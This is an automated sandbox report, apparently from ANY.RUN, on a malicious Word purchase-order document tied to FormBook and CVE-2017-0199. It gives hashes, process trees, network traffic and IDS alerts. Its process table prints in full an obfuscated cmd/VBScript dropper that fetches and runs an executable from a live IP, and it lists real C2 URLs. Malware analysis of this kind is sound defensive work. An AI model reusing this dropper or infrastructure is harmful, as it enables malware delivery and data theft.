File name: | PO OMULQP214.R8PO 18-049.docx |
Full analysis: | https://app.any.run/tasks/d180e6e0-300f-45a5-a51f-a2121b379d12 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | November 15, 2018, 02:57:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | 93C3E76659E7893FCEF5F63EF1AFC403 |
SHA1: | BB162586C1A1FAF0D5544F8223748E5ECA6F623E |
SHA256: | C37ED90B11B277ADA5CC16671052962A85E4B2CAD61079E45655A2A680C1C93E |
SSDEEP: | 384:TQeNh+wS115Wp39FG6F7//o5wMAqNciBph:OwAk9GAycGP |
.docx | | | Word Microsoft Office Open XML Format document (52.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (38.8) |
.zip | | | ZIP compressed archive (8.8) |
AppVersion: | 14 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 70 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 61 |
Words: | 10 |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2018:11:08 13:02:00Z |
CreateDate: | 2018:11:08 13:02:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | Olachi |
Creator: | Olachi |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1474 |
ZipCompressedSize: | 398 |
ZipCRC: | 0x344b4b79 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1388 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\PO OMULQP214.R8PO 18-049.docx" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 | ||||
2928 | C:\Windows\System32\mshta.exe -Embedding | C:\Windows\System32\mshta.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1760 | "C:\Windows\System32\cmd.exe" /c CD %temp% & @echo set S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l = createobject("wscript.shell") >UKUOJZ.vBS & @echo Dim M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o >>UKUOJZ.vBS & @echo Dim U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q >>UKUOJZ.vBS & @echo Dim W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p >>UKUOJZ.vBS & @echo Dim G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t >>UKUOJZ.vBS & @echo M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o = "http://31.184.198.161/~winvps/1_com/putt/tny.exe" >>UKUOJZ.vBS & @echo U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q = "VUHTXN.eXe" >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = CreateObject("MSXML2.XMLHTTP") >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Open "GET", M4vJ2xP2wO9kP4uU4pY1vS7jA6vW6nK0uW8cW1qW7lH8zH7nQ9gI2uS4yP6iD6o, False >>UKUOJZ.vBS & @echo W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.send ("") >>UKUOJZ.vBS & @echo If W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.Status = 200 Then >>UKUOJZ.vBS & @echo Set G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t = CreateObject("ADODB.Stream") >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Open >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Type = 1 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Write W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p.ResponseBody >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Position = 0 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.SaveToFile U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q, 2 >>UKUOJZ.vBS & @echo G0mY9hB8vY5nO1gT7qT8zW9nH2oN7pO4iK0qU9vF2tF8bY4kM2tO1t.Close >>UKUOJZ.vBS & @echo Set nE= Nothing >>UKUOJZ.vBS & @echo End If >>UKUOJZ.vBS & @echo Set W8mX0vP3eK6wS8wQ3zZ8jV3hE2zJ8eT2lV5hI4lB3jS7qA6p = Nothing >>UKUOJZ.vBS & @echo WScript.Sleep(5000) >>UKUOJZ.VBs& @echo S2zB4rN4jB5pO0tY9pG3qC3nP7xK1l.run(U5nZ8aE7kK7jH8uM4pV6wN4vY7bJ7qO0hE7gJ7wR1kG4cE7hR5fH6bL0q) >>UKUOJZ.vBS & sTaRt UKUOJZ.vbs | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3032 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\UKUOJZ.vBS" | C:\Windows\System32\WScript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3028 | "C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe" | C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe | — | WScript.exe |
User: admin Company: tynepc Integrity Level: MEDIUM Description: quincubital Exit code: 0 Version: 5.07 | ||||
1284 | C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe" | C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe | — | VUHTXN.eXe |
User: admin Company: tynepc Integrity Level: MEDIUM Description: quincubital Exit code: 0 Version: 5.07 | ||||
328 | "C:\Windows\SysWOW64\netsh.exe" | C:\Windows\SysWOW64\netsh.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Network Command Shell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1888 | /c del "C:\Users\admin\AppData\Local\Temp\VUHTXN.eXe" | C:\Windows\SysWOW64\cmd.exe | — | netsh.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2300 | taskhost.exe $(Arg0) | C:\Windows\system32\taskhost.exe | — | services.exe |
User: LOCAL SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1580 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3891.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{39D0F58A-AE1F-4674-8E9A-C45361B91228} | — | |
MD5:— | SHA256:— | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\{C354AB0B-328F-41CA-BDC2-6FC429CBF14F} | — | |
MD5:— | SHA256:— | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0436F7.doc | — | |
MD5:— | SHA256:— | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA731D.doc | — | |
MD5:— | SHA256:— | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{107D4A97-505F-4BB5-B68B-2816E94E4F2D}.FSD | binary | |
MD5:47CF87F1D1B3080BA9D8AE98E6E56294 | SHA256:0F96EE3566A65FFF3EC6B4BD08287F35529C5B582E42721DA6D50C4A704AE430 | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF | binary | |
MD5:FA663AA2A2CC81D334AA798280D87397 | SHA256:42A9B4E6ED8B15E202C0E298AC7407C52AC1781F8894D3244683EFD4A34215C6 | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD | binary | |
MD5:913C5A8668B6EAA75BBAF7B55B311B25 | SHA256:73C6B07EE7C3E56C625021BC9CF92D53AA326C736B97EFD7E53DE823D5FC33B2 | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D53A41.emf | emf | |
MD5:0B4608E6B88EBB3F196708ED5E3CA66A | SHA256:CF2A6EC134BFB707253F6FB6EE12E710FE19EDD7DF21963EF1B2185E1AE19D94 | |||
1388 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:06CCDE3B8728F297865B3E0725D09DBA | SHA256:F6DD025460CEB18492EE7AE1F1549F140D47A598353D9FBA784BA722E0FD9736 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1580 | explorer.exe | POST | — | 49.212.39.204:80 | http://www.smotret-kino.info/to/ | JP | — | — | malicious |
1388 | WINWORD.EXE | GET | 304 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious |
1388 | WINWORD.EXE | HEAD | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious |
1388 | WINWORD.EXE | HEAD | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious |
1388 | WINWORD.EXE | GET | 304 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious |
1580 | explorer.exe | GET | — | 107.149.96.149:80 | http://www.shengxingt.com/to/?3fvP=9rDlMJahCPK4Fjr&MJBD=X78yF5hIOyQJ6GHjsSUbF47AkG4xyqu0Metc16kallWXtvPCExGqCdCrSg7l6knT+AGF4Q==&sql=1 | US | — | — | malicious |
1388 | WINWORD.EXE | HEAD | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious |
1580 | explorer.exe | GET | — | 69.89.31.117:80 | http://www.prosperblackbeltacademy.com/to/?MJBD=SW0V7QQt3G4giruKI9/OR4jy8V485c0AlX5JOtgN18VBQDyZtQM9Ddj9tBjP8g0l16Phdw==&3fvP=9rDlMJahCPK4Fjr | US | — | — | malicious |
1388 | WINWORD.EXE | GET | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.hta | RU | html | 2.29 Kb | suspicious |
1388 | WINWORD.EXE | GET | 200 | 31.184.198.161:80 | http://31.184.198.161/~winvps/1_com/putt/tny.doc | RU | text | 10.3 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1580 | explorer.exe | 69.89.31.117:80 | www.prosperblackbeltacademy.com | Unified Layer | US | suspicious |
3032 | WScript.exe | 31.184.198.161:80 | — | Petersburg Internet Network ltd. | RU | suspicious |
860 | svchost.exe | 104.28.15.54:443 | urlz.fr | Cloudflare Inc | US | shared |
1388 | WINWORD.EXE | 104.28.15.54:443 | urlz.fr | Cloudflare Inc | US | shared |
1388 | WINWORD.EXE | 31.184.198.161:80 | — | Petersburg Internet Network ltd. | RU | suspicious |
1580 | explorer.exe | 107.149.96.149:80 | www.shengxingt.com | PEG TECH INC | US | malicious |
1580 | explorer.exe | 80.237.133.226:80 | www.yourfishingclub.com | Host Europe GmbH | DE | malicious |
1580 | explorer.exe | 49.212.39.204:80 | www.smotret-kino.info | SAKURA Internet Inc. | JP | malicious |
1580 | explorer.exe | 173.236.169.181:80 | www.oliverfluti.com | New Dream Network, LLC | US | suspicious |
1580 | explorer.exe | 199.192.26.77:80 | www.dozceb.com | — | US | malicious |
Domain | IP | Reputation |
---|---|---|
teredo.ipv6.microsoft.com |
| whitelisted |
urlz.fr |
| shared |
dns.msftncsi.com |
| shared |
www.rentorental.com |
| unknown |
www.4bookingonline.com |
| unknown |
www.tacohavenpresa.com |
| unknown |
www.prosperblackbeltacademy.com |
| malicious |
www.likerecommend.com |
| unknown |
www.ibnda.com |
| unknown |
www.neighborhood-sight.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1388 | WINWORD.EXE | A Network Trojan was detected | ET CURRENT_EVENTS CVE-2017-0199 Common Obfus Stage 2 DL |
1388 | WINWORD.EXE | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTA application download |
1388 | WINWORD.EXE | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
1388 | WINWORD.EXE | Attempted User Privilege Gain | ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
3032 | WScript.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
3032 | WScript.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
3032 | WScript.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3032 | WScript.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
1388 | WINWORD.EXE | Attempted User Privilege Gain | ET WEB_CLIENT GENERIC VB ShellExecute Function Inside of VBSCRIPT tag |
1580 | explorer.exe | A Network Trojan was detected | SC SPYWARE Trojan-Spy.Win32.Noon |